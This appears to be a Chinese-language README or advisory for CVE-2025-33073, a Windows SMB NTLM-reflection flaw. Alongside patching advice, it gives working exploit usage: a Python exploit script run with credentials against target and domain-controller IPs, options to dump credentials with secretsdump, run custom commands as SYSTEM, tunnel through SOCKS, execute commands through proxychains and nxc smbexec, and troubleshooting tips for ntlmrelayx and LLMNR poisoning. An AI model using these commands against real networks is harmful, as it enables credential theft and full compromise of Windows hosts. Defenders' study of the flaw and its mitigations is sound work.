CVE-2025-33073
🔥 高危:经身份验证的远程代码执行 🔥 Windows SMB 客户端中的访问控制不当 (CWE-284)
| 方面 | 详细信息 |
|---|---|
| CVSS v3.1 评分 | 8.8(高危) 🔥 |
| 受影响系统 | Windows 10, 11, Server 2012–2025(所有版本) 💻 |
| 披露日期 | 2025年6月10日 📅(已在 2025年6月补丁星期二 中修复) |
| 利用情况 | 已在野外被积极利用 😱 于 2025年10月21日 加入 CISA KEV |
| 攻击向量 | 网络(已认证) 🌐 |
| 影响 | SYSTEM 级代码执行 👑 通过 Kerberos 中继进行横向移动 |
| 绕过 | NTLM 反射缓解措施 ⚡ |
立即修补! 🔧
→ 应用 Microsoft 更新(例如 KB5060998)
→ Microsoft 更新指南 🔗
启用 SMB 签名 ✍️
→ 在 所有客户端和服务器 上强制执行
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
限制 NTLM 🚫
→ 尽可能阻止 NTLM
→ 使用 EDR 工具监控中继尝试
自动化修复? 🤖
→ 使用 Vicarius vRx 或自定义脚本进行批量修复
截至 2025年11月15日的状态:
✅ 已修复
❌ 在未修补系统中仍被利用
🔔 CISA 截止日期:2025年11月10日 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
自定义命令 可以执行自定义命令,而不是运行 secretsdump。
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
SOCKS 为了在以 SYSTEM 身份建立有效连接后更隐蔽地执行命令,此处 --target 和 --target-ip 应相同。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
还可以通过 proxychains 运行自定义命令,而不是转储 SAM。
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
如果你与该设备位于同一广播域,并且该设备容易受到 LLMNR 投毒攻击,那么无需注册 DNS 记录即可利用该设备。
我有时发现攻击不生效,因为攻击使用了主机名,导致 Kali 需要进行 DNS 查询。如果 Kali 未使用该 DNS 服务器,或者你从 impacket-ntlmrelayx 收到 '/ FAILED' 消息,请尝试将该主机添加到你的 /etc/hosts 文件中。这应该能使攻击生效。
如果使用 IP,攻击应该可以生效。有时多次运行会从失败变为成功。到目前为止,还不完全清楚为什么会发生这种情况。我认为这与网络有关。
使用 -M 或 --method 尝试其他强制方法。
发生本地 NTLM 身份验证
未发生本地 NTLM 身份验证,导致尝试失败
不要再等待——今天就修补! 🛑
你网络的安全取决于此。 💪